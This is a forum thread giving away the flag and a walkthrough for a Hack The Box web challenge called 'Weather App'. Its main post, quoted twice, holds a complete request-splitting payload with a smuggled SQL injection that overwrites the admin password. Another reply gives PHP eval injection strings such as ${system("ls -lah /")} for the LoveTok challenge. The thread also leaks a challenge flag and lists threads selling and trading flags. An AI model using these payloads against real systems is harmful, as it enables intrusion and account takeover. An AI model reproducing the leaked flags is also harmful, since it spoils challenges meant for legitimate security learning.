TUTORIAL Weather App Web Challenge free flag and little walkthrough
by lucifer113 - February 22, 2021 at 12:42 PM
#13
(March 07, 2021 at 06:28 PM)testing123dont Wrote:
(February 22, 2021 at 12:42 PM)lucifer113 Wrote: flag:

HTB{w3lc0m3_t0_th3_p1p3_dr34m}

walkthrough:

just send post:

POST /api/weather HTTP/1.1
Host: ip:port
User-Agent: cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 462
Connection: close

endpoint=127.0.0.1:80&city=ĠHTTP/1.1ĊHost:Ġ127.0.0.1:80ĊConnection:Ġkeep-aliveĊĊĊPOSTĠ/registerĠHTTP/1.1ĊHost:Ġ127.0.0.1:80ĊContent-Type:Ġapplication/x-www-form-urlencodedĊUser-Agent:ĠMozilla/5.0Ġ(X11;ĠLinuxĠx86_64;Ġrv:85.0)ĠGecko/20100101ĠFirefox/85.0ĊConnection:Ġkeep-aliveĊContent-Length:Ġ110ĊĊusername=adminĦpassword=admin%27)%20ON%20CONFLICT(username)%20DO%20UPDATE%20SET%20password=%27pass%27%20--+-ĊĊGETĠ/?&country=register


then go to http://ip:port/login and enter "admin:pass"

you will get the flag, enjoy!

null

Gives me error:

{"message":"Missing parameters"}

me also met thie problem,have you got a solution?
#14
(February 22, 2021 at 05:27 PM)z3uz Wrote:
(February 22, 2021 at 03:52 PM)lucifer113 Wrote: BTW, Dose anybody have LoveTok's writeup, i would really appreciate it, please help!

not exactly a walkthrough, but at least it's free so noone can complain i guess lol

lovetok is easy, it puts whatever you give it through an eval, so you can just pass it something in ${} which will execute whatever is in between the brackets as php code, so you can just do something like ${phpinfo()} to confirm you can execute code or ${system("ls -lah /")} to list all files in / and see what the flag file is called

am i lucky enough to get the right walkthrough,mogul?i'v tried http smuggling with "CL-TE" method ,but it dosent work.after this i tried "lucifer113" 's method , the request was sent in a complete way but not divided into three request.
through the zip i'v got the flag ,but i wanna figure out how it work  T^T
#15
Thank youuuu for sharing this
#16
(February 22, 2021 at 12:42 PM)lucifer113 Wrote: flag:

HTB{w3lc0m3_t0_th3_p1p3_dr34m}

walkthrough:

just send post:

POST /api/weather HTTP/1.1
Host: ip:port
User-Agent: cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 462
Connection: close

endpoint=127.0.0.1:80&city=ĠHTTP/1.1ĊHost:Ġ127.0.0.1:80ĊConnection:Ġkeep-aliveĊĊĊPOSTĠ/registerĠHTTP/1.1ĊHost:Ġ127.0.0.1:80ĊContent-Type:Ġapplication/x-www-form-urlencodedĊUser-Agent:ĠMozilla/5.0Ġ(X11;ĠLinuxĠx86_64;Ġrv:85.0)ĠGecko/20100101ĠFirefox/85.0ĊConnection:Ġkeep-aliveĊContent-Length:Ġ110ĊĊusername=adminĦpassword=admin%27)%20ON%20CONFLICT(username)%20DO%20UPDATE%20SET%20password=%27pass%27%20--+-ĊĊGETĠ/?&country=register


then go to http://ip:port/login and enter "admin:pass"

you will get the flag, enjoy!

null


thank you very much bro it works like a charm

Possibly Related Threads…
Thread Author Replies Views Last Post
FLAG TOXIC web hackthebox flag xploiter 1 427 Yesterday at 09:49 PM
Last Post: r00tarded
TRADING Will trade vmcrack or any other flag/writeup for project power challenge Iknowitsme 0 201 May 14, 2021 at 02:58 AM
Last Post: Iknowitsme
SELLING HACKTHEBOX TOP SELLER - ACTIVE MACHINE, CHALLENGE, XEN, POO, HADES, JET,RASTALABS, OS Mrbom 214 40,070 May 13, 2021 at 10:40 PM
Last Post: Mrbom

 Users browsing this thread: 2 Guest(s)